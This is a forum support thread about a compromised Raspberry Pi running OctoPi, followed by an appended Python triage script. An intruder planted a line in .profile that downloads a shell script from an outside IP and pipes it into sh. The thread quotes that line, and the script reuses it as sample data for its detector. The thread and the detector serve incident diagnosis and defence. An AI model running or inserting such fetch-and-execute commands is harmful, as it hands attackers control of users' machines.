SSH login strange process

What is the problem?
After I logged in via PuTTY over SSH, there is no prompt, but rather a process which tries to connect to http://161.35.78.255/system_manager.sh

I can press Ctrl + C to interrupt and get a prompt.
I don't know what this is.

What did you already try to solve it?
Tried to find it with grep -Ril "system_manager.sh"

Logs (syslog, dmesg, ... no logs, no support)
cat auth.log.1 | grep "161.35.78.255"
Sep 15 03:05:08 octopi sshd[19134]: Accepted password for pi from 161.35.78.255 port 45794 ssh2
Sep 15 03:05:08 octopi sshd[19171]: Accepted password for pi from 161.35.78.255 port 45802 ssh2

Additional information about your network (Hardware you are trying to connect to, hardware you are trying to connect from, router, access point, used operating systems, ...)

I use these auth settings:

[image]

Maybe there is something messed up in the PuTTY settings.

Maybe there is something in .profile or .bashrc or so.

Try to log in as root and see if the same problem occurs with su - pi.

Please provide some of the missing information. My first guess is that your system has been hacked. Could be the system you are connecting from or the RPi you are connecting to.

@ Ewald
I checked my settings, they are the same.
I have the same behavior from the Windows command line when I do ssh pi@192.168.0.17

Additional information about your network
Host System Windows 10
Raspberry Pi 3B
OctoPrint version : 1.4.2
OctoPi version : 0.17.0
LAN connection via hub

@ jandar
Bam, you were right. I checked the .profile and the last entry is

 # System updater below
 wget http://161.35.78.255/system_manager.sh -O- | sh > /dev/null 2>&1

So I commented it out and now I have normal behavior.

Thanks all for your time and your help.
So I'll check where it comes from...

This looks like someone got access to your system (did you create a port forward to SSH but did not set a strong password or better public key login only? Don't do that) and installed half of a command and control kit to make it part of a bot server. If I were you I'd nuke this and flash a fresh image, then rethink your network security. This machine looks compromised.

Mhhh, could be, and yes, sounds like it. A few months ago I played with some remote access via VPN.
So I'll check my network and clean up my system. Thanks all for your help.
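
Added example, not part of any post in this thread and not OctoPrint or OctoPi tooling: a triage check for the two indicators found above. It flags uncommented download-and-pipe-to-shell lines in login startup files and lists accepted SSH logins from non-private addresses. The regexes, function names and the 192.168.0.20 log line are assumptions made for this example.

```python
import ipaddress
import re
from pathlib import Path

# Files a login shell sources; a line added here runs at every login.
STARTUP_FILES = (".profile", ".bashrc", ".bash_profile", ".bash_login")
# A downloader whose output is piped straight into a shell.
FETCH_PIPE = re.compile(r"\b(wget|curl)\b[^|]*\|\s*(sudo\s+)?(ba|da|z)?sh\b")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\S+) for (\S+) from (\S+) port")

# Sample input: entries quoted in the thread plus constructed lines for contrast.
SAMPLE_PROFILE = """\
alias ll='ls -l'
# System updater below
wget http://161.35.78.255/system_manager.sh -O- | sh > /dev/null 2>&1
# wget http://161.35.78.255/system_manager.sh -O- | sh > /dev/null 2>&1
"""
SAMPLE_AUTH = """\
Sep 15 03:05:08 octopi sshd[19134]: Accepted password for pi from 161.35.78.255 port 45794 ssh2
Sep 15 09:12:41 octopi sshd[20311]: Accepted password for pi from 192.168.0.20 port 51512 ssh2
"""

def find_fetch_pipes(text):
    """Return (line_number, line) for each uncommented fetch-and-run line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped.startswith("#") and FETCH_PIPE.search(stripped):
            hits.append((number, stripped))
    return hits

def external_logins(log_text):
    """Return (method, user, ip) for accepted SSH logins from non-private IPs."""
    found = []
    for method, user, source in ACCEPTED.findall(log_text):
        try:
            if not ipaddress.ip_address(source).is_private:
                found.append((method, user, source))
        except ValueError:
            pass  # sshd logged a hostname, not an address
    return found

if __name__ == "__main__":
    print(find_fetch_pipes(SAMPLE_PROFILE), external_logins(SAMPLE_AUTH))
    for name in STARTUP_FILES:  # then the real files of the current user
        path = Path.home() / name
        if path.is_file():
            for number, line in find_fetch_pipes(path.read_text(errors="replace")):
                print(f"{path}:{number}: {line}")
```

Run it as the affected user; to review logins, pass the contents of /var/log/auth.log and its rotated copies to external_logins().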